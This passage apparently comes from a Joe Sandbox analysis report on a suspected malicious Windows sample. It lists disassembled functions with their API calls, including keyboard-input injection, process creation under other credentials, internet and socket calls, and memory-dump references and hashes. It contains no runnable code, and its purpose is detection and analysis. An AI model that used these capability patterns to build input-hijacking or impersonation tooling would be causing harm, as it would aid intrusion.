                                                                                                                                                                  • Instruction Fuzzy Hash: 3951C7B0A20306DBDB24AF69898066E77B5AF40320F34C769FA65962D3D7709D719B40
                                                                                                                                                                  Function 0024C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024C354
                                                                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 0024C384
                                                                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0024C3EA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                  • Opcode ID: 41b80a0b953b43676da4e52b64ce5e60686694b02ddf503404ab9f35502b8b51
                                                                                                                                                                  • Instruction ID: 7df22877e6dd07b5516c0c2cd6f261ebab25b1727aae6556d5122294c36e1b70
                                                                                                                                                                  • Opcode Fuzzy Hash: 41b80a0b953b43676da4e52b64ce5e60686694b02ddf503404ab9f35502b8b51
                                                                                                                                                                  • Instruction Fuzzy Hash: BC51AE31A11209EFCF28DF68D984AAE7BB6FF45360F208159F9159B290D770ED51CB90
                                                                                                                                                                  Function 0021D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0021D258
                                                                                                                                                                  • __itow.LIBCMT ref: 0021D292
                                                                                                                                                                    • Part of subcall function 0021D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0021D549
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0021D2FB
                                                                                                                                                                  • __itow.LIBCMT ref: 0021D350
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                                                  • Opcode ID: 9c70f82d7ea508e2126e6eed5ef4bb9c9e608d888dc4879eee73174468950a6d
                                                                                                                                                                  • Instruction ID: 5db2d9551373ff995598f63b18eed8ea55f19e38ae9185c6dc1bb87e04601e2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c70f82d7ea508e2126e6eed5ef4bb9c9e608d888dc4879eee73174468950a6d
                                                                                                                                                                  • Instruction Fuzzy Hash: D8410671A00749EBDF11DF54CC46BEE7BF9AF68700F000019FA15A3182DB709A95CB62
                                                                                                                                                                  Function 0024B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0024B3E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                                  • Opcode ID: 89fa763cc5c60dd8ce90c474de4d74868aa714ba758e96147f89e15dd90a88a1
                                                                                                                                                                  • Instruction ID: e85b0297e6493b2b9696fc60c15b0c000fc62e6db3b71967b43aa04c7f62c671
                                                                                                                                                                  • Opcode Fuzzy Hash: 89fa763cc5c60dd8ce90c474de4d74868aa714ba758e96147f89e15dd90a88a1
                                                                                                                                                                  • Instruction Fuzzy Hash: 9631E734630209FFEF2E9F59DCA9FA83B65EB05360F108512FA51D61E2C770D8609B51
                                                                                                                                                                  Function 0024D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024D617
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024D68D
                                                                                                                                                                  • PtInRect.USER32(?,?,0024EB2C), ref: 0024D69D
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0024D70E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                  • Opcode ID: a629ece72e70da36e38f3c3ca5cff875bebbcb9ee879b418a994d6a4d0235235
                                                                                                                                                                  • Instruction ID: 08b62337e8959cccff9796e139653a737eafc7d8135d5b04e5ef9810b93b7787
                                                                                                                                                                  • Opcode Fuzzy Hash: a629ece72e70da36e38f3c3ca5cff875bebbcb9ee879b418a994d6a4d0235235
                                                                                                                                                                  • Instruction Fuzzy Hash: F4419F34A10119DFDB1ACF59E888BA9BBF9FF46710F1581AAE4099B251D730E861CF40
                                                                                                                                                                  Function 00224497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002244EE
                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0022450A
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0022456A
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002245C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                  • Opcode ID: 6fe73ba1336cd8dad37112230054cda44b1c495f21e3a9f2e29d940adc67dd73
                                                                                                                                                                  • Instruction ID: 152d52f30e4c771003458a1d9eb8bb1bb2362878d5e1674a5a464f47db25d28d
                                                                                                                                                                  • Opcode Fuzzy Hash: 6fe73ba1336cd8dad37112230054cda44b1c495f21e3a9f2e29d940adc67dd73
                                                                                                                                                                  • Instruction Fuzzy Hash: 6631F671A202797BEF30AFA4F808BFE7BA59B69314F84015AF4C2561C1C7748A749B61
                                                                                                                                                                  Function 00214DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00214DE8
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00214E16
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00214E44
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00214E7A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  • Opcode ID: 8e69b084f5187d159ed73e56735e76170d4a5c70f4a96cfae1cd61dd4d0dadc4
                                                                                                                                                                  • Instruction ID: c80e95a8bfeb12d12600722999af64eab42d9aca78bc7222b88ec7a5a5c3ae53
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e69b084f5187d159ed73e56735e76170d4a5c70f4a96cfae1cd61dd4d0dadc4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31B231A10206AFDF21AF74C845BEA7BE5FF51310F158528E8698B1E1E771D8B1DB90
                                                                                                                                                                  Function 00247AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00247AB6
                                                                                                                                                                    • Part of subcall function 002269C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002269E3
                                                                                                                                                                    • Part of subcall function 002269C9: GetCurrentThreadId.KERNEL32 ref: 002269EA
                                                                                                                                                                    • Part of subcall function 002269C9: AttachThreadInput.USER32(00000000,?,00228127), ref: 002269F1
                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00247AC7
                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00247B00
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00247B06
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                  • Opcode ID: 34c3b2659995f5637ead13126aec25134174eebfe7dcb84366ded3e2d057fdf7
                                                                                                                                                                  • Instruction ID: 097ff68a27cbc7844d65d5f93f63a8886ca3fec25358d4db87e0f20d1f5b3d39
                                                                                                                                                                  • Opcode Fuzzy Hash: 34c3b2659995f5637ead13126aec25134174eebfe7dcb84366ded3e2d057fdf7
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31EB72D0011CAFCB00EFB5D8859EFBBF9EF58314B10806AE915E7211DB759E158BA0
                                                                                                                                                                  Function 0023497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002349B7
                                                                                                                                                                    • Part of subcall function 00234A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00234A60
                                                                                                                                                                    • Part of subcall function 00234A41: InternetCloseHandle.WININET(00000000), ref: 00234AFD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                                                  • Opcode ID: 58583cc08cfd85834252e0a14f271077efd761c4c891eb23324e733acfa562e9
                                                                                                                                                                  • Instruction ID: 1530ed21b56815cb26697a43a50287ba5688530d3377c2859912a7db6ec8b6a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 58583cc08cfd85834252e0a14f271077efd761c4c891eb23324e733acfa562e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21D4B1260605BFDB12AF609C15FBBB7A9FF48701F10401AFA0596650EBB1E820AB94
                                                                                                                                                                  Function 0021BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0021BCD9
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0021BCE0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 0021BCFA
                                                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021BD29
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2621361867-0
                                                                                                                                                                  • Opcode ID: 75ee18440eab24e958a52af4687858c2645f6d86b9c3efcd08f8097db1367d8a
                                                                                                                                                                  • Instruction ID: 93b1560a5fa6d9125102d253bedb4e5556c9f08ed0f9d2857db2e41d229a11c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 75ee18440eab24e958a52af4687858c2645f6d86b9c3efcd08f8097db1367d8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C218E7251020EAFCF029FA8ED49BDE7BF9EF15304F008015FA00A6160C7B68DA1DBA0
                                                                                                                                                                  Function 00248834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002488A3
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002488BD
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002488CB
                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002488D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                                  • Opcode ID: 2afa846bdd3f89791727bafb04e07e8d10bebfc44d7a255e166ab48d4cb9816c
                                                                                                                                                                  • Instruction ID: 44b002ae1651116b7caa4e5da247b558c24521c937fd656324524e24a4af3999
                                                                                                                                                                  • Opcode Fuzzy Hash: 2afa846bdd3f89791727bafb04e07e8d10bebfc44d7a255e166ab48d4cb9816c
                                                                                                                                                                  • Instruction Fuzzy Hash: 33117231725518AFDB18AB25DC05FAE7BA9AF95320F148115F916C72A1CBB4AC108B90
                                                                                                                                                                  Function 0023900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0023906D
                                                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0023907F
                                                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 0023908C
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002390A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                                                  • Opcode ID: 831d6747248948c358eaf0be2dd0a5194eaba8e568fe4fb7217fddf6045f2e95
                                                                                                                                                                  • Instruction ID: 3ec30d3a254380a90bf593e17ad466c8eb01bbe5ebaaf836c5e500a4e1075afb
                                                                                                                                                                  • Opcode Fuzzy Hash: 831d6747248948c358eaf0be2dd0a5194eaba8e568fe4fb7217fddf6045f2e95
                                                                                                                                                                  • Instruction Fuzzy Hash: CE214271A001289FC7159F69DC85A9ABBFCEF49710F00816AF849D7290D7B49A45CF91
                                                                                                                                                                  Function 002218E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?), ref: 00222CB9
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrcpyW.KERNEL32(00000000,?,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00222CDF
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrcmpiW.KERNEL32(00000000,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?), ref: 00222D10
                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00221916
                                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 0022193C
                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00221970
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                  • String ID: cdecl
                                                                                                                                                                  • API String ID: 4031866154-3896280584
